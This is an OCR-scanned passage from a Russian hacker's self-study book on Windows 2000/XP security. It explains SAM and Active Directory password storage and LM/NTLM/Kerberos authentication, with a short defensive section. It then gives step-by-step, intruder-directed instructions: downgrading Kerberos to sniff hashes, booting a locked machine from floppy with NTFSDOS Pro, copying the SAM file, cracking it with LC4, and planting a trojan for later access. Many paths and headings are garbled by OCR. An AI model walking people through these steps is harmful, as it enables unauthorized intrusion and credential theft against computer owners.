обеспечит его паролями доступа ко всем ресурсам компьютера. База SAM хранится в виде файла в каталоге %корневой„каталог%\зу51ет32\сопЛд\5ат, а база
AD — в каталоге %KopHeBoft_KaTanor%\ntds\ntds.dit. Так что, чего, казалось бы,
проще — открыть эти базы данных и прочитать содержимое! Не тут то было.
В стародавние времена, когда любителей чужих секретов было не так много и
они не были такие умные, это и в самом деле было несложно сделать, вернее, не
так сложно, как в системах Windows 2000/XP. Для защиты паролей в базе SAM в
системе Windows NT 4 использовалось слабенькое шифрование паролей, обеспечиваемое протоколом сетевой идентификации NTLM и, к тому же, для обратной
совместимости были оставлены пароли, зашифрованные согласно протоколу
сетевой идентификации LM, который использовался в предыдущих версия
Windows. Шифрование LM было настолько слабо, что пароли в SAM взламывались хакерскими утилитами, например, популярнейшей утилитой LOphtCrack
(http://www.atstacke.com) без всяких затруднений, методом прямого перебора
всех возможных вариантов.
Недостатком первых версий утилиты LOphtCrack было отсутствие инструмента извлечения шифрованных паролей из базы SAM, но с этой задачей успешно справлялась не менее известная программа, запускаемая из командной строки, pwdump
(http://www.atstacke.com). Так что в деле хакинга Windows царила полная гармония — программа pwdump извлекала из базы SAM шифрованные пароли учетных
записей и заносила их в файл, далее этот файл читала программа LOphtCrack, и
путем некоторых усилий — очень небольших, учитывая недостатки протокола
LM — расшифровывала добытые пароли.
29

Самоучитель хакера
Однако все изменилось с появлением Service Pack 3 для Windows NT 4, в котором было реализовано средство, называемое Syskey и представляющее собой
инструмент для стойкого (надежного) шифрования паролей, хранимых в SAM.
При желании пользователь Windows NT 4 мог включить средство Syskey самостоятельно; в системах же Windows 2000/XP шифрование Syskey устанавливается автоматически. В отличие от шифрования LM и NTLM шифрование Syskey
не позволяет выполнять взлом паролей простым перебором, поскольку при использовании паролей достаточной длины это потребует неприемлемых затрат
вычислительных ресурсов. Поэтому единственное, на что осталось надеяться
хакеру — это рассчитывать на недостатки политики безопасности, допускающие
применение пользователями паролей длиной 3-4 символа, а то и вовсе использование в качестве паролей слов из английского языка. Вспомните, мы приводили
в Главе 1 пример недавнего взлома базы данных Microsoft, шифрованной паролем длиной четыре символа — и это в Microsoft!
Так что хакерам пришлось поднапрячься и придумать более изощренные методы взлома системы защиты Windows. Чтобы разобраться в этих методах, давайте
рассмотрим более подробно, как работает эта защита.

Объекты системы зашиты
Как же система Windows 2000/XP управляет всеми этими участниками процесса
аутентификации, авторизации, аудита, в который вовлечены пользователи, компьютеры, группы пользователей с различными правами доступа к информационным
ресурсам? А вот как.
Каждый пользователь, компьютер, учетная запись или группа считаются объектом системы защиты Windows, и каждому такому объекту при его создании
присваивается так называемый идентификатор системы защиты SID (Security
IDentifier), представляющий собой 48-разрядное число, уникальное для всей
компьютерной системы. Каждому компьютеру после установки системы Windows 2000/XP присваивается случайно выбранное значение SID, и каждому домену Windows 2000 после инсталляции также присваивается случайно выбранное уникальное значение SID.
Все объекты системы защиты имеют определенные привилегии доступа к информационным ресурсам. А как же владельцы ресурсов определяют, какому
объекту разрешен доступ к данному конкретному ресурсу, и какой именно доступ? С этой целью для каждого информационного ресурса (файла, папки и т.д.) в
системе Windows задается список ACL (Access Control List — Список управления
доступом), который содержит записи АСЕ (Access Control Entries — Записи
управления доступом). Записи АСЕ содержат идентификаторы SID объектов
системы защиты и их права доступа к данному ресурсу. Списки ACL создаются
самими владельцами информационных ресурсов с помощью средств операционной

30

Защита Windows 2000/XP
системы, например, Проводника (Explorer) Windows, и работа с этими средствами
описана в любом руководстве по операционным системам Windows 2000/XP.
Вот как происходит работа со списками ACL. После регистрации в компьютере
Windows 2000/XP каждый объект (например, пользователь) получает от диспетчера LSA маркер доступа, содержащий идентификатор SID самого пользователя и набор идентификаторов 8Ш всех групп, в которые пользователь входит.
Далее, когда вошедший в систему пользователь обращается к ресурсу, служба
SRM сравнивает его маркер доступа с идентификаторами 8Ш в списке ACL ресурса, и если пользователь имеет право на доступ к ресурсу, то он его получает.
Как видим, все очень «просто», хотя на самом деле наше описание — это верхушка айсберга. Мы однако не будем углубляться в изучение системы защиты,
поскольку все, что нам нужно — это понять, как можно сломать всю эту конструкцию. Путей для этого множество, и их поиском и обустройством для всеобщего блага занято множество весьма квалифицированных людей. Один из самых
напрашивающихся и элегантных способов — это очистка списков ACL всех объектов, после чего система Windows 2000/XP открывается для любых манипуляций. И такие проекты имеются, находясь в стадии активной разработки (например, проект программы МТКар на сайте http://www.rootkit.com). Однако эффективность таких утилит умаляется тем обстоятельством, что доступ к спискам
ACL сам по себе требует административных привилегий!
Раз все так не просто при локальном доступе к компьютеру, то чего можно ожидать от каких-либо путей вторжения, связанных с процессом сетевой идентификации пользователя домена? Ведь при этом по сети передается множество конфиденциальной информации, включая пароли. Обсудим эту задачу, но вначале
рассмотрим, из чего состоит сеть компьютеров Windows 2000/XP.

Активный каталог
ЕСЛИ основой построения сети компьютеров Windows NT 4 были домены, т.е.
группы компьютеров под управлением контроллера, то сети Windows 2000/XP
структурируются и управляются с помощью служб активного каталога ADS
(Active Directory Services). Службы ADS устанавливаются и управляются средствами серверов Windows 2000, и выполняемые при этом процедуры описаны в
руководствах по использованию систем Windows 2000 Server. Мы не будем повторять их содержимое, а просто постараемся указать, что интересного может
найти хакер во всех этих активных каталогах.
Все компоненты компьютерной сети — компьютеры, пользователи, ресурсы,
службы, учетные записи — для службы ADS являются объектами, свойства которых определяются с помощью атрибутов, т.е. параметров различного назначения. Например, объект учетная запись имеет атрибут имя пользователя, а
объекты компьютер имеют атрибут IP-адрес компьютера в локальной сети.

31

Самоучитель хакера
Для удобства управления этими объектами в ADS используются объекты, называемые контейнерами, задача которых — хранить в себе остальные объекты, в
том числе контейнерные. К контейнерным объектам относятся организационные
единицы OU (Organization Units), которые могут включать в себя пользователей,
группы, компьютеры, принтеры, приложения, политики системы защиты, общие
файлы и папки, плюс другие OU. Назначение OU — упростить администрирование компьютерной сети путем разделения ее на части с разными характеристиками, т.е. можно поместить в отдельные OU различные компьютеры и пользователей, после чего настроить работу этих OU с учетом содержимого.
Для организации сети компьютеров Windows 2000/XP они могут объединяться в
логические единицы, называемые доменами. Каждый домен управляется контроллерами домена, хранящими общую для домена информацию и выполняющими централизованную авторизацию подсоединяющихся пользователей. В домене
Windows 2000 контроллеров может быть несколько, и все они — равноправны, что
отличает домен Windows 2000 от домена Windows NT. Таким образом, компьютеры одного домена совместно используют единую базу учетных записей, и вошедший в домен пользователь имеет доступ ко всем общим ресурсам домена.
Для структурирования компьютерной сети домены Windows 2000/XP могут быть
объединены в деревья, а деревья могут быть объединены в лес. Таким образом,
вся сеть организации может состоять из доменов отделов, и при этом каждый
домен будет иметь собственное имя и контроллер. Между всеми доменами деревьев и лесов организуются двусторонние доверительные отношения, т.е. входящие в один домен компьютеры могут получать доступ к компьютеру из другого домена в лесу или дереве.
Преимущество использования такой модели состоит в возможности структурирования имен сетевых компьютеров, которые должны соответствовать их положению в лесу доменов. Допустим, у нас имеется домен с именем domen. Тогда
компьютеры домена именуются так: com*!.domen, comp2.domen… А теперь
допустим, что в сети имеется множество доменов, и каждый домен имеет свое
имя, допустим, domenl, domen2,… Чтобы организовать дерево доменов, создается несколько ветвей, и к имени каждого домена в ветви слева приписывается
имя смежного с ним домена в направлении от корня дерева.
Например, если domenl и domen2 входят в одну ветвь, причем domen2 «вырастает» из domenl, то компьютеры из domen2 будут именоваться comp1.domen2.domenl, comp2.domen2.domen1, … compN.domen2.domen1. А чтобы организовать
из двух доменов domenl и domen2 лес, имеющий имя forest, то его имя добавляется справа от имени домена. Таким образом, компьютеры в domenl будут именоваться compl.domenl.forest, comp2.domen1.forest , а в domen2 компьютеры
будут именоваться как compl.domen2.forest, comp2.domen2.forest, …. Между
всеми доменами леса устанавливаются двусторонние доверительные отношения.

32

Защита Windows 2000/XP
В общем, вся эта возня с доменами — занятие для системных администраторов, для
хакера тут интересно вот что: права доступа к ресурсам доменов леса или дерева
для различных учетных записей зависят от их членства в трех основных группах.
• Универсальная группа (Universal group), членами которой могут быть пользователи всего леса, и следовательно, членство в универсальной группе предоставляет доступ к компьютерам всего леса.
• Глобальная группа (Global Group), членами которой могут быть только
пользователи одного домена, соответственно, членство в глобальной группе
предоставляет доступ к ресурсам всего домена.
• Локальные группы домена (Local group domain), членами которой могут
быть пользователи всего леса, но локальные группы могут быть использованы только для управления доступом к ресурсам одного домена.
Именно эти группы следует указывать в списках ACL для задания прав доступа
к информационным ресурсам. Теперь хакеру все становится понятным — для
взлома сети лучше всего получить права члена универсальной группы. А для
этого можно, например, взломать базу AD, либо перехватить в сети пароль при
регистрации пользователя на контроллере домена, либо проделать еще какуюлибо штучку, коими переполнены новости с фронта виртуальных сражений.
Вообще-то база AD устроена наподобие SAM, так что для нее справедливы все
те слова, что сказаны ранее про шифрование и взлом паролей в SAM. Однако
взлом AD затруднен тем обстоятельством, что размер AD, как правило, весьма
велик (до 10 Мб), и база AD хранится на серверах, которые, чаще всего, защищены на порядок лучше клиентских компьютеров. Таким образом, наиболее оптимальной стратегией хакера может быть проникновение в клиентский компьютер с последующими попытками взлома контроллеров домена. Для этого можно,
скажем, с помощью снифера перехватить пароли и логины, необходимые для
входа пользователя в домен Window 2000, во время их передачи по сети на контроллер домена. Такие программы существуют, например, последняя версия LC4
программы LOpghtCrack снабжена эффективным механизмом перехвата и сетевых пакетов с целью последующего взлома паролей.
Мы еще поговорим про эту в высшей степени полезную программу, но пока рассмотрим поподробнее, как происходит процедура сетевой идентификации пользователей — там имеются и еще кое-какие интересные возможности.

Регистрация Ъ домене Windows 2000
При регистрации пользователя в домене Windows 2000 используется процедура
запроса с подтверждением, означающая следующее. Вначале контроллер домена передает клиентскому компьютеру запрос — случайное число, для которого
33
2 — 5830

Самоучитель хакера
клиент подсчитывает значение одной очень важной криптографической функции, называемой хэш-функцией, или просто хэшем, используя при этом пароль
пользователя в качестве аргумента. Что такое хэш-функция, вы можете прочесть, например, в [7], здесь же ограничимся лишь указанием, что все хэшфункции имеют следующее характерное свойство. Настоящую хэш-функцию
очень просто вычислить по значению аргументов, но вот наоборот, вычислить
значения аргументов по значению хэш-функции почти невозможно, поскольку это
требует нереальных вычислительных ресурсов. Вот что это дает системе защиты.
Подсчитанную хэш-функцию клиент передает обратно контроллеру домена, и
контроллер снова подсчитывает эту же хэш-функцию для тех же аргументов переданного клиенту значения случайного числа и пароля пользователя, который хранится в базе AD. Если оба значения хэш-функции совпадают — пользователь аутентифицирован, поскольку такого совпадения практически невозможно
достичь без знания аргументов — такова природа хэш-функции. Преимущества
такой аутентификации очевидны — пароль по сети не передается, а использование
случайного числа гарантирует невозможность повторных использований перехваченных запросов и ответов для прохождения сетевой регистрации.
Для хакера все эти криптографические штучки весьма интересны в следующем
отношении. Во-первых, при такой сетевой аутентификации по сети передаются
всего лишь значения хэш-функции пароля. Во-вторых, даже поверхностного
знания криптографии достаточно для уяснения факта, что восстановление пароля по значению хэш-функции невозможно только практически, но теоретически
это возможно, хотя бы методом прямого перебора или, как говорят в криптографии, методом «грубой силы».
Объем вычислений, необходимый для взлома пароля, определяет крттостойкость, т.е надежность протокола сетевой аутентификации. И вот тут-то и возникает большая дыра, в которую пролезло немало шустрых личностей, которые,
исследовав методы шифрования протокола LM, пришли к выводу — взлом протокола LM вполне возможен вследствие некой грубой криптографической
ошибки (подробности можно узнать, к примеру, в [3]). Для исправления ситуации Microsoft выпустила гораздо более защищенный протокол NTLM (в Service
Pack 3 для Windows NT 4) и протокол NTLMv2 (в Service Pack 4 для Windows NT 4).
И, наконец, в Windows 2000 появился протокол Kerberos, который стал первым
по-настоящему стойким протоколом сетевой идентификации, призванным
обезопасить сетевое взаимодействие компьютеров в процессе идентификации.
Однако не тут то было.
Дело в том, что в системах Windows 2000/XP для обеспечения обратной совместимости со старыми системами Windows поддерживаются все предыдущие версии протоколов, включая LM. И если компьютеры Windows 2000/XP не в состоянии идентифицировать друг друга по протоколу Kerberos, они автоматически переходят на использование ненадежных протоколов NTLM или LM.
34

Защита Windows 2000/XP
Так что хакеры действуют следующим образом — они блокируют специально
сформированными сетевыми пакетами TCP-порт 88 контроллера домена, используемый Kerberos, и вынуждают компьютеры переходить на старые версии
протоколов аутентификации. Дальнейшее понятно без объяснения — с помощью
снифера перехватываются пакеты с паролями для идентификации по протоколам LM или NTLM, после чего с помощью утилиты LOphtCrack выполняется
взлом пароля.
Таким образом, положение антихакера выглядит безнадежным — кажется, что
нет никакой возможности отбиться от хакерских попыток взлома компьютерной
сети. И в самом деле, что может сделать антихакер?

Антихакинг
Для защиты от столь хитроумных любителей чужих секретов прежде всего требуется создать эффективную политику безопасности, которая, помимо прочего,
включала бы меры по ограничению физического доступа к компьютеру. Следует
четко уяснить, что если хакер получит локальный доступ к компьютеру, то рано
или поздно все содержащиеся в нем конфиденциальные данные будут раскрыты.
Если компьютер подсоединен к сети, то следующим шагом хакера будет взлом
сетевых серверов. Как вы, наверное, уже поняли, возможностей у него будет
предостаточно.
Выработка политики безопасности и настройка системы защиты компьютера
должна производиться постепенно, по мере накопления информации о возможных
угрозах и опыта по их парированию. Однако с самого начала эксплуатации системы можно применить средство обеспечения безопасности компьютера, называемое шаблонами безопасности, впервые появившимися в системах Windows 2000.
Эти шаблоны представляют собой целые наборы параметров системы защиты,
подготовленные Microsoft для всеобщего использования, и включающие настройки политики безопасности для автономного компьютера, рабочей станции
и контроллера домена. В системах Windows XP шаблоны безопасности получили
дальнейшее развитие и обеспечивают достаточно надежную защиту от широко
распространенных атак компьютеров Windows.
Установка и настройка этих шаблонов подробно описана в справочной системе
Windows 2000/XP или в книге [7], так что не будем повторяться. Начав с установки шаблона безопасности, далее можно постепенно уточнять эти настройки,
создав собственную базу данных системы защиты, отражающую ваш личный
опыт работы с системой. Прочность своей защиты можно проверять с помощью
сканеров безопасности, например, приложения Retina, о работе с которым можно прочитать в книге [7].

35

Самоучитель хакера
Наилучшим же техническим решением защиты от сетевых атак методом перехвата трафика является во-первых, отказ от использования старых версий протоколов аутентификации. Во-вторых, следует прибегнуть к технологиям криптографической защиты, в частности, к построению сети VPN (Virtual Private
Network — Виртуальная частная сеть). Технология VPN заранее предполагает,
что кабельная система сети не защищена от хакерских вторжений и все передаваемые данные могут быть перехвачены. Поэтому весь сетевой трафик VPN
шифруется надежными алгоритмами, исключающими или сильно затрудняющими перехват расшифровки данных.
Все эти старания, конечно, не пропадут даром, однако, как говорит известный
специалист по криптографии Брюс Шнайер (Bruce Schneier), автор бестселлера
«Прикладная криптография» (Applied Cryptography), безопасность — это процесс.
Нет такого метода защиты, который сможет раз и навсегда обезопасить компьютерную систему — схватка хакера и антихакера не прекратится никогда, по
крайней мере, в обозримом будущем этого точно не произойдет. Так что в следующей главе мы познакомимся с первым эпизодом этой Великой Виртуальной
Войны — локальным вторжением в компьютер, т.е. наиболее эффективным и
полноценным способом взлома системы.

Заключение
В этой главе вы познакомились со средствами обеспечения безопасности
Windows 2000/XP и узнали о «болевых точках» системы защиты, которые используются хакерами для выполнения наиболее широко распространенных атак.
Теперь вас не смутят аббревиатуры SAM, LSA, SRM, ADS, LM, NTLM, Kerberos
и так далее. Введенные здесь термины и обозначения будут использоваться
при описании орудий взлома систем Windows, к которым мы переходим со
следующей главы. Желающие углубить свои познания в сфере средств защиты
Windows 2000/XP, сетей ТСР/ГР и служб ADS могут обратиться к большому числу прекрасных литературных источников, из которых можно выделить серию
книг Microsoft Press по серверам Windows 2000.

36

ГЛАВА 3

Прсжикио&еиые Ъ систему
Познакомившись в предыдущей главе с системой защиты Window 2000/XP, вы,
наверное, уже задались вопросом, а как же можно обойти все «ЗА» навороченных средств обеспечения безопасности, которые создавало большое число квалифицированных специалистов? Все зависит от обстоятельств, и в Главе 2, где
были перечислены возможные пути вторжения в компьютер, первым в списке
стояло локальное вторжение, когда хакер получает физический доступ к консоли
управления компьютерной системы, что обеспечивает ему наибольшее число возможностей хакинга. Вот с него мы и начнем. (Только не подумайте, что вас будут
учить лазить в форточку или обшаривать помойки — для этого вы можете обратиться к Интернету. Здесь же мы ограничимся компьютерными технологиями.)
Вообще-то возможность такого вторжения в наибольшей степени обуславливается ненадлежащим выполнением правил политики безопасности организации, а
то и полным ее отсутствием. Ныне вполне заурядна ситуация, когда к компьютерной сети неведомо кем и как подключено множество компьютеров, а политика информационной безопасности сводится к листочку со списком паролей,
приклеенным к монитору (потом их выбрасывают на помойку — ну и…).
Так что для получения локального доступа к компьютеру хакеру может и не потребоваться орудовать отмычками, лазить через забор или в открытую форточку, чтобы попасть в помещение с компьютерами. После чего, пройдя все испытания, бедный хакер, подсвечивая себе фонариком и пугливо озираясь, должен
заняться выкручиванием винчестера для последующего исследования, или пытаться войти в компьютерную систему, поминутно рискуя быть схваченным и
посаженным за решетку (поскольку все это — чистейшей воды уголовщина).
Неужели все так страшно? Да нет же, нет — чаще всего нужно просто протянуть
руку и сорвать плод, висящий над головой. Во многих случаях свободный доступ к компьютерному оборудованию — вещь достаточно обычная.
Итак, хакер сел за рабочий стол с компьютером и приступил к работе. Первое,
что ему следует сделать — это войти в систему под учетной записью с высокими
привилегиями, лучше всего — администратора системы. Тут существуют варианты, и мы их постараемся рассмотреть.
Во-первых, вполне возможна ситуация, когда и делать-то ничего не надо — сотрудник Вася Пупкин вышел на перекур и надолго застрял в курительной комнате за обсуждением вчерашнего футбольного матча, а его компьютер отображает на экране окно проводника Windows. Это вполне реально, как и то, что на
мониторе может быть приклеен листочек со списком паролей доступа, и каждый
пользователь — как минимум член группы опытных пользователей, которым
разрешена установка программ и доступ почти ко всем ресурсам компьютера.
И чего тут удивляться, что, рано или поздно, все такие системы попадают в лапы

Самоучитель хакера
типов наподобие доктора Добрянского (см. Главу 1), а уж они-то найдут чем там
заняться, мало не покажется. Описанная ситуация — это полный хаос в политике
безопасности организации, и, повторяем, таких организаций — полным-полно.
Во-вторых, в более благополучных организациях на экране покинутых компьютеров может светиться заставка, защищенная паролем, или же при попытке входа хакеру отображается приглашение на ввод пароля системы Windows или системы BIOS компьютера. Тогда хакеру для входа в компьютер придется поработать с системой защиты, и один из путей получения доступа к ресурсам компьютера Windows 2000/XP состоит в загрузке системы со съемного носителя.

со съемного носителя
ЕСЛИ вход в компьютерную систему закрыт паролем доступа, то хакер может
попытаться загрузить систему со съемного носителя — дискеты или компактдиска (естественно, при наличии дисководов). Чего, казалось бы, проще — вставляй загрузочную дискету с системой MS-DOS в дисковод и включай компьютер!
Однако подождите с выводами — все не так просто, и тут есть свои подводные
камни. Во-первых, загрузка системы со съемного носителя может быть запрещена настройкой параметров BIOS системы, а доступ к параметрам BIOS закрыт
паролем. Эту ситуацию мы рассмотрим в следующем разделе.
Во-вторых, даже если загрузка со съемного носителя в BIOS разрешена, то вы
можете столкнуться с проблемой доступа к файловой системе NTFS, поддерживаемой только системами Windows 2000/XP. Таким образом, после загрузки системы MS-DOS вы просто-напросто не увидите жесткого диска — вожделенного
хранилища информации, из-за которого все и было затеяно.
Конечно, можно быстро-быстро, потея и озираясь по сторонам, вывинтить жесткий диск и убежать (автор категорически не советует — если поймают — все, и
надолго! И потом, как говаривал О. Бендер, все это «низкий сорт, грязная

работа»),
чтобы потом спокойно исследовать его содержимое на своем компьютере
Windows 2000/XP. Но более квалифицированный хакер поступит иначе — он
прибегнет к утилите NTFSDOS Professional (http://www.winternals.com) компании Winternals Software LP, которая позволяет получить доступ к дискам NTFS
из системы MS-DOS. Помимо всего прочего, эта утилита чрезвычайно полезна
при порче операционной системы, утрате пароля входа в Windows 2000/XP и в
других случаях. Так что эта утилита полезна обоим участникам виртуальной
битвы — и хакеру, и антихакеру. Поэтому опишем работу с утилитой NTFSDOS
Professional — она это заслужила.

38

Проникновение в систему

Утилита М1Т51Ю5 fro
Применение утилиты NTFSDOS Pro заключается в следующем. После инсталляции программы в главном меню Windows создается папка NTFSDOS Professional
с командой вызова мастера NTFSDOS Professional Boot Disk Wizard (Мастер
загрузочных дисков NTFSDOS Professional). Запуск этого мастера создает загрузочную дискету или жесткий диск, который может быть использован для работы
с томами NTFS. Опишем работу мастера по шагам.
Перед началом работы вы должны создать две загрузочные дискеты, воспользовавшись командами FORMAT/S или SYS системы
MS-DOS. Или же можно создать эти дискеты с помощью команды
форматирования Windows XP с установленным флажком Create an
MS-DOS startup disk (Создать загрузочную дискету MS-DOS).
> Выберите команду главного меню Пуск * Программы » NTFSDOS Professional
(Start » Programs » NTFSDOS Professional). На экране появится диалог с приветствием (Рис. 3.1).

wizard will help you install V/indows NT/200DvXP system files needed
NTFSDOS Professional to run from a MS-DOS diskette or hard disk

PMC. 3.1. Приветственный диалог мастера установки NTFSDOS Pro
> Щелкните мышью на кнопке Next (Далее). На экране появится следующий диалог (Рис. 3.2), в котором отображается напоминание о необходимости иметь под
рукой две загрузочные дискеты, о которых мы уже упоминали чуть выше.
> Если у вас имеются загрузочные дискеты, то нажмите кнопку Next (Далее),
иначе займитесь созданием этих дискет.
По умолчанию NTFSDOS Pro использует версию набора символов MS DOS для
США (кодовая страница 437). В отобразившемся третьем диалоге мастера
(Рис. 3.3) предлагается выбрать дополнительный набор символов.

39

Самоучитель хакера

NTFSDOS Professional Boot Disk Wizard copies drivers and system files from an existing Windows
NT/20QP/xP installation or CD-ROM to your hard disk or a pair of floppy diskettes.
If you wish to create bootable diskettes you must add MS-DOS to the diskettes yourself, either before or
after using this program. Use the FORMAT/S or SYS commands from a MS-DOS shell to make
bootable diskettes.
You can also make a bootable diskette on Windows XP by opening My Computer, selecting the
«Format» option from the context menu of your diskette drive, and formatting a diskette with the «Create
an MS-DOS startup disk» option checked.

< Back

Next >

Cancel

J

Рис. З.2. Диалог с предупреждением о необходимости
иметь системные дискеты

NTFSDOS Pro uses the character set tor Hie United States version of MS-DOS (aide page 437) by default
Select any additional character sets you use with DOS.
Japan, code page 932
Korean (Johab). code page 1361
Korean, code page 949
MS-DOS Canadian-French, code page 863
MS-DOS Icelandic, code page 661
MS-DOS Multilingual (Latin 1). code page 650
MS-DOS Nordic, code page 865
MS-DOS Portuguese, code page 86
MS-DOS Slavic (Latin II). code page 852

< Back

Next >

Cancel

Рис. З.З. Диалог выбора языковой поддержки
> Выберите требуемый набор и щелкните мышью на кнопке Next (Далее).
На экране появится следующий диалог мастера установки NTFSDOS Pro
(Рис. 3.4).
В этом диалоге надо указать место хранения системных файлов Windows
NT/2000/XP, необходимых NTFSDOS Pro. Следует выбрать или корневой каталог системы, например, C:\WINNT, либо каталог \I386 инсталляционного диска
Windows NT/2000/XP, либо компакт-диск с Service Pack.
>• Сделайте свой выбор и щелкните мышью на кнопке Next (Далее). На экране
появится следующий диалог мастера установки NTFSDOS Pro (Рис. 3.5).
40

Проникновение в систему

Pro uses copies of several files located in your Windows NT/200Q/XP
m directory.
Specify the name of your Windows NT/2Q.OOVXP installation directory, or a directory containing the required
Windows NT/2000№ system files.
|c\ASFRool

Щелкните мышью на кнопке Finish (Завершить), чтобы завершить работу
мастера.
Теперь вы готовы работать с программой NTFSDOS Pro, что не вызывает особых
затруднений. Для этого следует установить в дисковод первую дискету NTFSDOS
Pro и перезагрузить компьютер с этой дискеты. После этого, не вынимая дискету из
дисковода, следует запустить исполняемый файл NTFSPRO.EXE, который смонтирует диски NTFS компьютера. Последующая работа с этими дисками, как и
со всем компьютером, выполняется с помощью команд MS-DOS так, как это
делается при использовании файловых систем FAT и FAT32, причем утилита
NTFSDOS Pro поддерживает длинные имена файлов и папок.
Загрузив систему MS-DOS и обеспечив поддержку NTFS, вы можете безо всяких
помех со стороны системы входной регистрации Windows 2000/XP делать с системой что угодно. Вы сможете копировать файлы, форматировать жесткий диск
(зачем — дело ваше), и выполнять другие, не менее увлекательные действия, которые едва ли понравятся хозяину компьютера. Однако, если вы — уважающий свое
время и труд хакер, вам, прежде всего, следует подумать о будущем и заняться делом. Например, полезно встроить в только что взломанную систему различные
инструменты для облегчения последующего доступа, что достигается установкой
трояна, который будет сообщать вам обо всех действиях пользователей. Также
очень неплохо скопировать на свой носитель информации разные файлы и папки
взломанной системы для последующего изучения — и не забудьте о базе SAM,
которая, напоминаем, находится в каталоге корень_системы/зуз1ет32/соп1’|д.

43

Самоучитель хакера

ы 5АМ
Чтобы взломать базу SAM, вначале следует получить доступ к файлу SAM.
Для этого можно прибегнуть к описанной выше утилите NTFSDOS Pro, загрузить систему MS-DOS компьютера и скопировать файл SAM из системной папки компьютера /KOpeHb_CMCTeMbi/system32/config на дискету. Далее этот
файл может быть использован для дешифрования какой-либо программой, например, LC4 — новейшей версией широко известной программы LOphtCrack
(http://www.atstake.com).
На Рис. 3.9 представлено окно приложения LC4 с открытым меню Import (Импорт).

«IB?!

Import | Senion

Help

Import From Local Machine
Import From Remote Registiy..
Import From SAM File…
Import From Sniffer…
Import From .LC File…
Import From .LCS (LC3) File
Import Frum PWDUMP File…

I Выберите команду меню File * New Session (Файл * Создать сеанс). Отобразится диалог, подобный Рис. 3.9.
> Выберите команду меню Import »Import From SAM File (Импорт * Импорт из
файла SAM). На экране появится сообщение о недоступности файла SAM.
>• Нажмите кнопку О К и загрузите в появившемся диалоге файл SAM, полученный при взломе компьютера А1ех-3.
>• В отобразившемся диалоге (Рис. 3.10) выберите команду Session » Begin Audit
(Сеанс » Запуск аудита) и запустите процедуру взлома паролей учетных записей.
44

Проникновение в систему
?l@stakeLC4 -(Unlilbdll
File

View

Import

Sestion

Help

.i» u
_u

lALEX-3

IALEX-З
(ALEX-З
lALEX-3
lALEX-3
lALEX-3
[ALEX-3

Administrator

• empty ‘

ASPNET
Guett
HelpAssittant
IUSH_ALEX-3

• empty ‘
• empty ‘
• empty ‘

IWAM_ALEX-3
NewUzer

• amply •
» empty ‘

* т т \ ft \ т
‘ empty ‘

e.;

Od Oh Qm us

i as
CS

mporled 7 accounts

Puc. 3.10. Ход процедуры взлома SAM отображается в панели справа
В зависимости от сложности пароля, время, необходимое для взлома SAM, может быть весьма велико. При благоприятном исходе отобразится диалог, показанный на Рис. 3.11, в котором представлены взломанные пароли SAM.

Adnuniitialoi
ASPNET
Gue»l
HelpAti.tlonl
IUSH.ALEX-3
IWAM.ALEX-3
NenUter

Рис. 3.11. Пароли базы SAM взломаны!
Все это очень интересно, поскольку теперь мы знаем пароль учетной записи администратора — 007 и, следовательно, можем делать с компьютером что угодно.
Время, потраченное на взлом пароля, составляет около 5 минут на компьютере
Pentium 2 с частотой процессора 400 МГц. Такая скорость обусловлена просто45

Самоучитель хакера
той пароля — всего три цифры, что позволило программе LC4 быстро перебрать
все комбинации цифр и символов.
Для настройки процедуры взлома в программе LC4 применяется диалог Auditing
Options For This Session (Параметры аудита для текущего сеанса), представленный на Рис. 3.12.
Dictionary Crack D

Enabled

Dictionary List [

The Dictionary Deck tests For passwords that are the same as the words listed in the
word file. This test is very fast and finds the weakest passwords.
Dictionary/Brute Hybrid Crack
El Enabled

|0

Characters to prepend

3

I П Characters to append

П Common letter substitutions (much slower)
The Dictionary/Brute Hybrid Crack tests for passwords that are variations of the words in
the word file. It finds passwords such as «Dana99» or «monkeys!». This test is fast and
finds weak passwords.
Brute Force CrackCharacter Set

El Enabled
D

|A-ZandO-9

Distributed

Ptrtli.

Custom Claraclw Set Ш «ch ch«*:ttrt

J

I Oil

The Brute Force Crack tests fa passwords that are made up of the characters specified
in the Character Set. It finds passwords such as «WeR3pll6s» a «vC5«69t12b». This
lest is slow and finds medium to strong passwords. Specify a character set with more
characters to crack stronger passwords.

OK

Cancel

Puc. 3.12. Параметры настройки процедуры взлома паролей
Как видим, параметры работы LC4 разделены на три группы:
Dictionary Crack (Взлом по словарю), в которой содержится кнопка Dictionary
List (Список словарей), отображающая диалог для выбора словаря с тестируемым набором слов. Вместе с программой LC4 поставляется небольшой словарь
английских слов, однако в Интернете можно найти весьма обширные словари, позволяющие хакеру быстро перебрать практически все общераспространенные
слова английского языка. Отсюда понятно, почему не следует при выборе пароля
использовать осмысленные словосочетания, например, имена, названия городов,
предметов и т.д., поскольку все они элементарно взламываются словарной атакой.
Dictionary/Brute Hybrid Crack (Словарь/Комбинированный силовой взлом), где
можно указать число цифр, добавляемых после и/или перед словом, выбранным
из словаря, перед тестированием полученной строки. Так что если вы выберете
себе пароль типа Password???, его взлом неминуем.

46

Проникновение в систему
Brute Force Crack (Взлом грубой силой), где вы можете настроить взлом паролей прямым перебором всех комбинаций символов из указанного набора. Это
наиболее трудоемкий взлом паролей, и его успех зависит от сложности паролей
и мощности компьютера. В открывающемся списке Character Set (Набор символов) можно выбрать набор применяемых при взломе символов или, выбрав
пункт Custom (Пользовательский), ввести в ставшее доступным поле Custom
Character Set (List each character) (Пользовательский набор символов (перечислите каждый символ)) набор дополнительных символов. Установка флажка
Distributed (Распределенный) предоставляет возможность вычислять пароль
сразу на нескольких компьютерах. Для этого следует командой File » Save
Distributed (Файл » Сохранить распределенный) сохранить файл сеанса в виде
нескольких частей и исполнять их на нескольких компьютерах.
Программа LC4 представляет собой весьма мощный инструмент взлома защиты
Windows NT/2000/XP. Мы еще вернемся к ней при обсуждении средств сетевого
взлома компьютеров Windows, а сейчас познакомимся с популярной программой
взлома систем Windows 95/98, называемой Pwltool.

‘Рзлом доступа к файлам и лапкам
Число инструментов для взлома паролей доступа к информационным ресурсам Windows весьма значительно, поэтому здесь мы опишем только некоторые, завоевавшие определенную популярность в хакерских кругах. Мы обсудим пакет инструментов взлома документов MS Office компании Элкомсофт
(http://www.elcomsoft.com), который так и называется — OfficePassword 3.5.
После этого мы продвинемся чуть дальше и покажем, как можно выловить пароли доступа к различным ресурсам, скрытые за строкой звездочек «*******»
Эту задачу прекрасно решает завоевавшая широкую популярность утилита
Revelation от компании SnadBoy (http://www.snadboy.com).
Если у вас возникнет желание продвинуться в этом направлении и
